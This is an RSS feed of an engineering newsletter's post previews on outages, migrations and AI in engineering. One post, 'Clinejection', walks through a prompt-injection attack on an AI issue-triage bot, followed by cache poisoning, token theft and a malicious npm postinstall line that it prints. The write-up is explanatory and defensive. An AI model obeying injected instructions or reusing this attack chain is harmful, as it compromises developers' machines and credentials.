<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[Byte-Sized Design]]></title><description><![CDATA[Master system design concepts, engineering fundamentals, and interview basics. Weekly summaries, post-mortems, and advice for 42,000+ engineers.]]></description><link>https://read.bytesizeddesign.com</link><image><url>https://substackcdn.com/image/fetch/$s_!UMZA!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png</url><title>Byte-Sized Design</title><link>https://read.bytesizeddesign.com</link></image><generator>Substack</generator><lastBuildDate>Fri, 24 Apr 2026 08:49:50 GMT</lastBuildDate><atom:link href="https://read.bytesizeddesign.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[Byte-Sized Design]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[bytesizeddesign@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[bytesizeddesign@substack.com]]></itunes:email><itunes:name><![CDATA[Byte-Sized Design]]></itunes:name></itunes:owner><itunes:author><![CDATA[Byte-Sized Design]]></itunes:author><googleplay:owner><![CDATA[bytesizeddesign@substack.com]]></googleplay:owner><googleplay:email><![CDATA[bytesizeddesign@substack.com]]></googleplay:email><googleplay:author><![CDATA[Byte-Sized Design]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[HubSpot's 37-Minute Lesson in Why HTTP 200 Can Lie]]></title><description><![CDATA[The permission check that passed, the users who were locked out, and what monitoring for "availability" actually misses]]></description><link>https://read.bytesizeddesign.com/p/hubspots-37-minute-lesson-in-why</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/hubspots-37-minute-lesson-in-why</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Wed, 22 Apr 2026 16:34:15 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!UMZA!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3>TL;DR</h3><p>3:43 PM EST to 4:20 PM EST. 37 minutes. Every HubSpot customer lost the ability to click into contact, company, order, or project workflows in the UI. Deal-based and ticket-based workflows still worked. Every backend automation kept firing on schedule. No data lost. No execution missed.</p><p>And the whole thing flew under the radar because the endpoint that broke kept returning HTTP 200.</p><p>The incident monitoring didn&#8217;t catch it. The automated canary checks didn&#8217;t catch it. A 60-minute alert threshold meant the tests that <em>did</em> fail weren&#8217;t going to page anyone until well after customers had already flooded support.</p><p>This is a textbook case of the thing we keep writing about: your observability is only as good as what you&#8217;re actually measuring. 
If you&#8217;re measuring &#8220;did the server respond,&#8221; you&#8217;re going to miss every bug that makes the server respond <em>with the wrong answer.</em> HubSpot&#8217;s post-mortem is refreshingly direct about this, and there&#8217;s a clean lesson in it for anyone running permission systems, feature flags, or anything else where the shape of a correct response matters more than its existence.</p><p>If you&#8217;ve been around for <a href="https://bytesizeddesign.substack.com/p/cloudflares-july-2025-outage-the">the Cloudflare July 2025 outage breakdown</a> or the <a href="https://bytesizeddesign.substack.com/p/the-aws-october-20th-outage-dissection">AWS October 20th dissection</a>, this one will feel familiar. Different blast radius. Same category of failure.</p><div><hr></div><h3>So what actually happened?</h3><p>HubSpot was rolling out a permissions framework update. The goal was reasonable: replace a broad shared scope with narrower, object-type-specific scopes for contact, company, order, and project workflows. Tighter permissions, better isolation. Standard stuff.</p><p>The rollout had two pieces:</p><ol><li><p>Create the new permission scopes.</p></li><li><p>Promote the user role assignments that map those scopes to the right users.</p></li></ol><p>Piece one made it to production. Piece two didn&#8217;t.</p><p>The staging environment had both pieces, so staging worked. Production had scopes without role assignments, so production&#8217;s access-control system went looking for user-role mappings that didn&#8217;t exist. When it couldn&#8217;t find them, it did what permission systems are supposed to do: fail closed. Deny access.</p><p>From the access-control system&#8217;s perspective, this was correct behavior. Users were asking about permissions the system couldn&#8217;t verify, so the system returned a restrictive access level.</p><p>From the user&#8217;s perspective, their workflows vanished.</p><h3>The 200 that lied</h3><p>Here&#8217;s the part worth dwelling on. The access endpoint returned HTTP 200 the whole time. The server didn&#8217;t crash. It didn&#8217;t throw. It didn&#8217;t log an error. It just returned a technically-valid response that said &#8220;this user can barely do anything.&#8221; The frontend, doing its job, saw &#8220;barely anything&#8221; and hid the UI.</p><p>Most monitoring treats HTTP status codes as ground truth. 2xx is fine, 4xx is the client&#8217;s problem, 5xx pages the on-call. It&#8217;s a useful abstraction, and it&#8217;s wrong in exactly this scenario. The server is healthy. The payload is garbage.</p><p>We covered something very similar in <a href="https://bytesizeddesign.substack.com/p/how-twitch-caught-invisible-failures">how Twitch caught their invisible failures</a>&#8212;streams that terminated &#8220;successfully&#8221; from the server&#8217;s point of view while users saw nothing. Same failure mode, different domain. When correctness lives in the response body rather than the status line, your dashboards need to look inside the response.</p><h3>Why the canary didn&#8217;t save them</h3><p>HubSpot&#8217;s automated test suite <em>did</em> catch failures during the canary window. Those failures fired into a queue that was configured to wait 60 minutes before paging anyone.</p><p>Sixty minutes.</p><p>The deployment rolled out fully in 33 minutes. The entire incident lasted 37 minutes from first impact to rollback. The alerts would have arrived after the problem was already resolved.</p><p>Alert thresholds are a real tradeoff. 
Too tight and your on-call drowns in noise from flaky tests. Too loose and you get this. The right answer is rarely a single global threshold; it&#8217;s a threshold <em>in context.</em> Failures during an active deployment window are categorically different from failures on a quiet Tuesday morning, and HubSpot is correctly calling that out in their remediation plan. Correlate the alerts with the deploys. Shrink the window to minutes during rollout.</p><p>This is the kind of instrumentation gap that shows up over and over in post-mortems. For more on how to actually write these documents well instead of just surviving them, <a href="https://bytesizeddesign.substack.com/p/writing-post-mortems-a-tech-leads">our tech lead&#8217;s guide to writing post-mortems</a> covers the framing that distinguishes a useful post-mortem from a corporate apology.</p>
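<p>To make the &#8220;look inside the response&#8221; point concrete: a useful check for an endpoint like this asserts on the payload, not just the status line. A minimal sketch, with a hypothetical endpoint, scope names, and response shape rather than HubSpot&#8217;s actual API:</p><pre><code>import requests

# Hypothetical semantic canary: a 200 alone proves nothing, so we check
# that a known probe user still holds the scopes we expect to see.
EXPECTED_SCOPES = {"workflows.contacts.read", "workflows.companies.read"}

def check_permissions(base_url: str, probe_user_id: str) -> None:
    resp = requests.get(f"{base_url}/access/{probe_user_id}", timeout=5)
    resp.raise_for_status()                      # only catches 4xx/5xx
    granted = set(resp.json().get("scopes", []))
    missing = EXPECTED_SCOPES - granted
    if missing:
        # Server is "healthy", payload is wrong -- this is what should page.
        raise RuntimeError(f"permission check degraded, missing: {missing}")</code></pre><h3>The split-brain deployment</h3>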
      <p>
          <a href="https://read.bytesizeddesign.com/p/hubspots-37-minute-lesson-in-why">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Slack Rebuilt Notifications for Millions of Users]]></title><description><![CDATA[Slack rebuilt its notification system from scratch, here's the architecture decision that made it possible without breaking millions of users.]]></description><link>https://read.bytesizeddesign.com/p/slack-rebuilt-notifications-for-millions</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/slack-rebuilt-notifications-for-millions</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Mon, 30 Mar 2026 01:14:20 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/dcac9027-7ac5-4833-ba12-f4db942ef784_1160x653.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Notification overload is one of the top three reasons users contact Slack support. Not security incidents. Not data loss. Ping anxiety.</p><p>That stat is embarrassing for a company whose product is literally communication. But what&#8217;s interesting isn&#8217;t the problem, it&#8217;s why it was so hard to fix.</p><h3><strong>The system wasn&#8217;t broken. It was incoherent.</strong></h3><p>Desktop and mobile had entirely separate preference systems that had grown apart over years. &#8220;Nothing&#8221; on mobile meant something different from &#8220;Off&#8221; on desktop. Not slightly different. Architecturally different. One disabled push notifications. The other disabled in-app badges too. Users changing settings on one device had no predictable effect on the other.</p><p>This is how trust erodes. Not with crashes. With settings that don&#8217;t do what you think they do.</p><p>The core design flaw was a tight coupling between <em>what</em> notifies you and <em>how</em> you get notified. If you wanted fewer interruptions on mobile, your only lever also killed in-app awareness. There was no way to say &#8220;show me everything in the sidebar but only push me for mentions.&#8221; You had to pick between overload or ignorance.</p><h3><strong>Four preference systems became one</strong></h3><p>The old prefs looked like this:</p><pre><code><code>desktop: everything | mentions | nothing   // Push on desktop
mobile:  everything | mentions | nothing   // Push on mobile</code></code></pre><p>The word &#8220;nothing&#8221; is doing dishonest work there. Users who chose it thought they&#8217;d gone quiet. They hadn&#8217;t &#8212; they still got in-app badges. They just didn&#8217;t know it.</p><p>The new model decouples the two concerns cleanly:</p><pre><code><code>desktop: everything | mentions // What activity to show
desktop_push_enabled: true | false // Whether to interrupt you
mobile: everything | mentions | nothing</code></code></pre><p><code>desktop_push_enabled</code> is new. Because it had no prior value in the database, the team could backfill every existing user based on whether they&#8217;d previously set &#8220;off&#8221;: no disruption, no migration emails, no support tickets. &#8220;Off&#8221; became &#8220;mentions with push disabled&#8221; at read time, which is exactly what it meant in practice anyway.</p><p>That&#8217;s a clean migration. Backwards compatible, rollback-safe, and behaviorally honest.</p>
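<p>A minimal sketch of what that read-time translation could look like, with hypothetical field names rather than Slack&#8217;s actual schema: legacy rows never carry <code>desktop_push_enabled</code>, so the old tri-state value is mapped onto the new pair the moment it&#8217;s read.</p><pre><code># Hypothetical read-time backfill: old "nothing"/"Off" becomes
# "mentions with push disabled" in the new, decoupled model.
def resolve_desktop_prefs(stored: dict) -> dict:
    if "desktop_push_enabled" in stored:
        # Already on the new model; nothing to translate.
        return {"desktop": stored["desktop"],
                "desktop_push_enabled": stored["desktop_push_enabled"]}
    legacy = stored.get("desktop", "everything")  # everything | mentions | nothing
    if legacy == "nothing":
        return {"desktop": "mentions", "desktop_push_enabled": False}
    return {"desktop": legacy, "desktop_push_enabled": True}</code></pre><h3><strong>The real difficulty: millions of users, years of state</strong></h3>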
      <p>
          <a href="https://read.bytesizeddesign.com/p/slack-rebuilt-notifications-for-millions">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Uber Killed Hours-Old Data (And Why Your Batch Jobs Are a Liability)]]></title><description><![CDATA[What they found when they finally did the math on stale data.]]></description><link>https://read.bytesizeddesign.com/p/how-uber-killed-hours-old-data-and</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-uber-killed-hours-old-data-and</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 24 Mar 2026 05:16:10 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!lkl9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>TLDR</h2><p>Hours-old data. Petabyte scale. Thousands of engineers making decisions on stale numbers.</p><p>Uber&#8217;s data lake powers Delivery, Mobility, Finance, Marketing Analytics, and Machine Learning for a company with hundreds of millions of users. For years, the ingestion layer ran on Spark batch jobs. Data arrived in the lake hours late. Sometimes a full day late.</p><p>That was fine when the business moved slowly. It stopped being fine when data freshness became a competitive bottleneck&#8212;when model iteration speed, real-time experimentation, and operational analytics demanded minutes, not hours.</p><p>So they rebuilt ingestion from scratch on Apache Flink. The result: freshness dropped from hours to minutes, compute costs dropped 25%, and the system now handles petabyte-scale streaming across thousands of datasets.</p><p>This is IngestionNext. And the problems they had to solve to get there are exactly the kind of problems most data teams quietly ignore until they can&#8217;t anymore.</p><div><hr></div><h2>The Dirty Secret About Batch Ingestion</h2><p>Here&#8217;s the thing nobody wants to say out loud: batch jobs are slow by design, and most teams have just accepted that as the cost of doing business.</p><p>You run a Spark job every hour. Maybe every 30 minutes if you&#8217;re ambitious. The job spins up, reads from Kafka or a transactional database, transforms the data, writes it to the lake. Then it tears down. An hour later, it does it all again.</p><p>At small scale this is totally fine. Predictable. Easy to debug. The operational overhead is low.</p><p>At Uber&#8217;s scale, hundreds of petabytes, thousands of datasets&#8212;those batch jobs were burning hundreds of thousands of CPU cores every day. Not because the work required that many cores. Because that&#8217;s how batch scheduling works. You provision for the peak, the peak is infrequent, and everything in between is wasted capacity.</p><p>And even if you ignore the cost problem, there&#8217;s no fixing the freshness problem. Batch is batch. If your job runs every hour, your data is up to an hour old. Period.</p><p>For model training, that&#8217;s a delay in experiment velocity. For fraud detection, that&#8217;s a window where bad actors operate undetected. For marketplace analytics, that&#8217;s a lag between what happened and when anyone can respond to it.</p><p>Uber looked at this and decided hours-old data was no longer acceptable. They needed minutes. 
That meant streaming.</p><blockquote><p>If you want to see how Uber&#8217;s data lake got to 350PB in the first place, and the replication problems that scale created, read <a href="https://bytesizeddesign.substack.com/p/how-uber-moved-1-petabyte-a-day-and">Inside Uber&#8217;s 350PB Data Lake: The Distcp Rewrite That 5x&#8217;d Performance</a>.</p></blockquote><div><hr></div><h2>Why Flink, Not Just &#8220;More Spark&#8221;</h2><p>The obvious question: why not just run Spark Structured Streaming? It exists. It integrates with Kafka. Half the data ecosystem already knows how to use it.</p><p>Because Spark Structured Streaming still thinks in micro-batches. It&#8217;s better than full batch scheduling, but it&#8217;s not true streaming. You&#8217;re still dealing with the same fundamental model: accumulate records, process a chunk, commit.</p><p>Flink is a different mental model. It processes records as they arrive. Checkpoints are asynchronous, not tied to batch intervals. The state management is first-class. For continuous ingestion at this scale, Flink&#8217;s execution model is a better fit.</p><p>Uber already had Flink infrastructure. The ecosystem supported it.
That made the decision easier, but the architecture challenges were anything but easy.</p><blockquote><p>Pinterest went through a similar reckoning with Spark at scale, rebuilding their entire Hadoop-based platform into a container-native Spark system. Worth reading alongside this one: <a href="https://bytesizeddesign.substack.com/p/how-pinterest-runs-spark-at-scale">How Pinterest Runs Spark at Scale with Moka</a>.</p></blockquote><div><hr></div><h2>The Architecture</h2><div class="captioned-image-container"><figure><img src="https://substackcdn.com/image/fetch/$s_!lkl9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0e1db2f-b775-4ab4-9f03-3ae686fb9fa1_1536x699.avif" width="1456" height="663" alt=""></figure></div><p>Events arrive in Kafka. Flink jobs consume them continuously and write to the data lake in Hudi format.</p><p>Hudi is doing serious work here. It provides transactional commits, rollback support, and time travel queries on top of what would otherwise be raw Parquet files on object storage. When a Flink job fails mid-write, Hudi rolls back the uncommitted data. When someone wants to query data as of a specific timestamp, Hudi handles it.</p><p>Above the data plane sits a control plane that manages the job lifecycle across thousands of datasets. Create, deploy, restart, stop, delete&#8212;all automated. Configuration changes propagate without manual intervention. Health checks run continuously. This isn&#8217;t glamorous infrastructure work, but at Uber&#8217;s scale, &#8220;we have 4,000 ingestion jobs&#8221; means operations without a control plane is a full-time fire drill.</p><p>There&#8217;s also regional failover. If a region goes dark, ingestion jobs reroute or fall back to batch mode. No data loss. No manual intervention required.</p><p>The architecture isn&#8217;t surprising. The interesting parts are the problems that showed up once it was running.</p>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-uber-killed-hours-old-data-and">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[GitHub’s Elasticsearch Problem Was Seven Years in the Making. Here’s How They Finally Fixed It]]></title><description><![CDATA[Why the right fix wasn't available until now, and what they did in the meantime.]]></description><link>https://read.bytesizeddesign.com/p/githubs-elasticsearch-problem-was</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/githubs-elasticsearch-problem-was</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Mon, 16 Mar 2026 06:51:44 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!UMZA!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3><strong>TL;DR</strong></h3><p>GitHub Enterprise Server runs search on Elasticsearch. It also runs High Availability with a primary/replica model. For years, those two things could not coexist cleanly. Elasticsearch would move a primary shard to the read-only replica node. If you then took down that replica for maintenance, the whole thing deadlocked. The replica waited for Elasticsearch to recover before it could start. Elasticsearch couldn&#8217;t recover until the replica rejoined.</p><p>GitHub engineers knew this was broken. They spent years trying to patch around it. It took until Elasticsearch shipped Cross Cluster Replication to actually fix it.</p><p>The fix is live in GHES 3.19.1. The lesson underneath it is older than GitHub.</p><div><hr></div><h3><strong>The Original Sin Was a Reasonable Decision</strong></h3><p>Let&#8217;s be precise about what went wrong here, because it&#8217;s easy to read this story as &#8220;Elasticsearch bad&#8221; when the real issue is more interesting.</p>
      <p>
          <a href="https://read.bytesizeddesign.com/p/githubs-elasticsearch-problem-was">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How a 12-Word Issue Title Owned 4,000 Developer Machines]]></title><description><![CDATA[TLDR One GitHub issue title.]]></description><link>https://read.bytesizeddesign.com/p/how-a-github-issue-title-installed</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-a-github-issue-title-installed</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sat, 07 Mar 2026 08:20:05 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!UMZA!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>TLDR</h2><p>One GitHub issue title. Five steps. 4,000 compromised developer machines. Eight hours before anyone noticed.</p><p>The entry point wasn&#8217;t a zero-day. It wasn&#8217;t a misconfigured S3 bucket or a stolen password. It was natural language, a crafted string in an issue title that an AI triage bot read, interpreted as an instruction, and executed with full CI privileges.</p><p>This is Clinejection. It&#8217;s worth understanding in detail, because the attack surface it exposed isn&#8217;t unique to Cline. It&#8217;s in your repo too.</p><div><hr></div><h2>The Attack Chain Nobody Had a Playbook For</h2><p>On February 17, 2026, someone published <code>cline@2.3.0</code> to npm. The CLI binary was byte-identical to the previous version. The only change was one line in <code>package.json</code>:</p><p>json</p><pre><code><code>"postinstall": "npm install -g openclaw@latest"</code></code></pre><p>For the next eight hours, every developer who installed or updated Cline got OpenClaw&#8212;a separate AI agent with full system access&#8212;silently installed on their machine. About 4,000 downloads before the package was pulled.</p><p>Here&#8217;s how the attacker got the npm token to publish it.</p><div><hr></div><h2>Step 1: Prompt Injection Via Issue Title</h2><p>Cline had deployed an AI-powered issue triage workflow using Anthropic&#8217;s <code>claude-code-action</code>. The workflow allowed any GitHub user to trigger it by opening an issue. The issue title was interpolated directly into Claude&#8217;s prompt:</p><p>yaml</p><pre><code><code>${{ github.event.issue.title }}</code></code></pre><p>No sanitisation. The attacker opened Issue #8904 with a title that looked like a performance report but contained an embedded instruction: install a package from a specific GitHub repository.</p><p>Claude read the issue title as part of the prompt. Claude followed the instruction. That&#8217;s prompt injection. It&#8217;s well-documented. It&#8217;s not new. It just hadn&#8217;t been weaponised against a CI workflow at this scale before.</p><div><hr></div><h2>Step 2: The Bot Executes Arbitrary Code</h2><p>Claude ran <code>npm install</code> pointing to the attacker&#8217;s fork&#8212;a typosquatted repository named <code>glthub-actions/cline</code>. Note the missing &#8216;i&#8217; in &#8216;github&#8217;. The fork&#8217;s <code>package.json</code> contained a preinstall script that fetched and executed a remote shell script.</p><p>This is where most engineers mentally say &#8220;we would catch that.&#8221; You wouldn&#8217;t. The bot ran with the privileges of the CI environment. There was no human in the loop. 
The operation looked like routine dependency installation.</p><div><hr></div><h2>Step 3: Cache Poisoning</h2><p>The shell script deployed Cacheract&#8212;a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of data, triggering GitHub&#8217;s LRU eviction policy. The legitimate cache entries got evicted. The poisoned entries were keyed to match the pattern used by Cline&#8217;s nightly release workflow.</p><p>When that workflow ran and restored <code>node_modules</code> from cache, it got the compromised version.</p><div><hr></div><h2>Step 4: Credential Theft</h2><p>The compromised <code>node_modules</code> ran during the release workflow&#8212;the one that held <code>NPM_RELEASE_TOKEN</code>, <code>VSCE_PAT</code>, and <code>OVSX_PAT</code>. All three exfiltrated.</p><div><hr></div><h2>Step 5: Malicious Publish</h2><p>Using the stolen npm token, the attacker published <code>cline@2.3.0</code> with the OpenClaw postinstall hook. The package was live for eight hours before StepSecurity&#8217;s automated monitoring flagged it&#8212;approximately 14 minutes after publication.</p><div><hr></div><h2>The Botched Rotation That Made It Worse</h2><p>Security researcher Adnan Khan had discovered and reported the full vulnerability chain on January 1, 2026. He followed up multiple times over five weeks. No response.</p><p>When Khan publicly disclosed on February 9, Cline patched within 30 minutes by removing the AI triage workflows. They started credential rotation the next day.</p><p>Then they deleted the wrong token. The exposed one stayed active. They caught the error on February 11 and re-rotated&#8212;but the attacker had already exfiltrated the credentials, and the npm token remained valid long enough to publish six days later.</p><p>A separate, unknown actor had found Khan&#8217;s proof-of-concept on his test repository and weaponised it.</p><div><hr></div><h2>Why None of Your Existing Controls Would Have Caught This</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-a-github-issue-title-installed">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Meta Used LLMs to Build Tests That Are Supposed to Fail]]></title><description><![CDATA[The tests that were built to fail]]></description><link>https://read.bytesizeddesign.com/p/metas-tests-are-supposed-to-fail</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/metas-tests-are-supposed-to-fail</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 24 Feb 2026 16:52:49 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!MX8E!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffef15fcc-97a4-48bc-a537-15a357fe3fbc_1200x600.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2><strong>TLDR</strong></h2><p>Most test generation tries to make tests pass. Meta built a system where the whole point is to make them fail, on the code change you&#8217;re about to land, before it lands. Out of 41 engineer reach-o&#8230;</p>
      <p>
          <a href="https://read.bytesizeddesign.com/p/metas-tests-are-supposed-to-fail">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[The Architect Is Not Being Replaced. The Architect Is Being Redefined.]]></title><description><![CDATA[And if you don't notice the difference, you'll end up on the wrong side of it.]]></description><link>https://read.bytesizeddesign.com/p/the-architect-is-not-being-replaced</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/the-architect-is-not-being-replaced</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 17 Feb 2026 09:35:43 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/5516b99e-3589-47cd-822c-e4518897adfc_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3><strong>TLDR</strong></h3><p><a href="https://www.cnbc.com/2025/05/14/klarna-ceo-says-ai-helped-company-shrink-workforce-by-40percent.html">Klarna went from 7,400 to 3,000 employees</a> and called it AI. Then <a href="https://mlq.ai/news/klarna-ceo-admits-aggressive-ai-job-cuts-went-too-far-starts-hiring-again-after-us-ipo/">quietly started rehiring</a>. Google&#8217;s engineers now review more than <a href="https://clouddon.ai/will-ai-agents-replace-humans-in-software-developer-jobs-beyond-assistance-to-replacement-eedde4ae7c04">30% AI-written code</a>. <a href="https://blog.tmcnet.com/blog/rich-tehrani/ai/how-uber-built-ai-agents-that-saved-21000-developer-hours.html">Uber&#8217;s AI agents saved 21,000 developer hours</a> &#8212; using a LangGraph-based system they call &#8220;Validator.&#8221; <a href="https://spectrum.ieee.org/ai-effect-entry-level-jobs">Entry-level programmer employment in the US fell 27.5%</a> between 2023 and 2025.</p><p>The junior engineer is already being displaced. The mid-level engineer is next.</p><p>But the software architect? That role isn&#8217;t shrinking. It&#8217;s becoming the most important job in the building. The question is whether architects understand what it now actually requires.</p><div><hr></div><p><strong>The AI-replaces-engineers narrative is mostly wrong and also not entirely wrong. The nuance is where it gets interesting.</strong></p><p>Klarna is the most cited example. In 2024, the company&#8217;s OpenAI-powered chatbot handled 2.3 million customer conversations in its first month. By late 2024, <a href="https://www.cnbc.com/2025/05/14/klarna-ceo-says-ai-helped-company-shrink-workforce-by-40percent.html">their headcount was down 40% from peak</a>. CEO Sebastian Siemiatkowski went on CNBC and said the quiet part out loud: AI did this. Then, in 2025, <a href="https://mlq.ai/news/klarna-ceo-admits-aggressive-ai-job-cuts-went-too-far-starts-hiring-again-after-us-ipo/">he quietly started rehiring</a>. &#8220;We went too far,&#8221; he admitted. Customer satisfaction had cratered. The AI couldn&#8217;t handle nuance, empathy, or edge cases. The humans they&#8217;d shed were carrying context the model couldn&#8217;t learn from a training set.</p><p>The Klarna story isn&#8217;t a win for the pro-AI camp or the anti-AI camp. It&#8217;s a case study in where the boundary actually is right now. Structured, repetitive, high-volume interactions? AI wins. Unstructured, novel, high-stakes decisions that require organizational and human context? Humans still win. Not comfortably. Not permanently. But for now, yes.</p><p>Software architecture sits at exactly that boundary. 
And that&#8217;s why the next few years will either be the best time in history to be a senior architect &#8212; or the last generation of architects who learned the craft before AI ate the curriculum.</p><div><hr></div><h2>What Uber Actually Proved</h2><p>The most concrete AI-augmentation-in-engineering story from the last 12 months isn&#8217;t from an AI company. It&#8217;s from Uber.</p><p><a href="https://blog.langchain.com/top-5-langgraph-agents-in-production-2024/">Uber&#8217;s Developer Platform team</a> built an internal AI agent called Validator using <a href="https://medium.com/@hieutrantrung.it/the-ai-agent-framework-landscape-in-2025-what-changed-and-what-matters-3cd9b07ef2c3">LangGraph</a>, the graph-based orchestration framework that reached general availability in May 2025. Validator doesn&#8217;t make product decisions. It doesn&#8217;t design services. It catches bad code before it ships &#8212; running linting, checking build validity, surfacing test design issues, doing the kind of thankless hygiene work that junior engineers traditionally owned.</p><p>Then they built Autocover on top of it. Same architecture. Autocover generates test cases automatically using domain-specific expert agents. Engineers trigger it from inside their IDE. It streams context-aware tests in real time. For large files, the system executes up to 100 tests concurrently.</p><p>Result: 10% increase in test coverage across the Developer Platform. <a href="https://blog.tmcnet.com/blog/rich-tehrani/ai/how-uber-built-ai-agents-that-saved-21000-developer-hours.html">21,000 developer hours saved</a>.</p><p>That&#8217;s not a small number. That&#8217;s equivalent to roughly 10 full-time engineers doing a year of grunt work, automated.</p><p>But here&#8217;s the part that didn&#8217;t make the headline: Uber found that deterministic agents &#8212; rule-based, hand-coded logic &#8212; outperformed LLMs for tasks like linting and build execution. The LLM wasn&#8217;t the hero of every scene. The architecture was. Someone at Uber had to decide what gets an LLM node, what gets a deterministic function node, and how the graph flows between them. That person is an architect.</p><div><hr></div><h2>The Real Job Description Is Changing</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/the-architect-is-not-being-replaced">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Inside Uber’s 350PB Data Lake: The Distcp Rewrite That 5x’d Performance]]></title><description><![CDATA[How Uber scaled data replication from 250TB to 1PB per day by optimizing Apache Distcp, cutting latency 90%, 5x&#8217;ing capacity, and migrating 306PB to cloud.]]></description><link>https://read.bytesizeddesign.com/p/how-uber-moved-1-petabyte-a-day-and</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-uber-moved-1-petabyte-a-day-and</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Wed, 11 Feb 2026 20:46:19 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/8ead3563-41f5-4a1f-90ac-9b06292fc74b_1536x1003.avif" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2><strong>TLDR</strong></h2><p>250 TB to 1 PB per day. One quarter. Daily replication jobs jumped from 10,000 to 374,000. Uber&#8217;s data lake hit 350 PB and their copy tool couldn&#8217;t keep up. The P100 SLA of 4 hours became a joke.&#8230;</p>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-uber-moved-1-petabyte-a-day-and">
              Read more
          </a>
      </p>
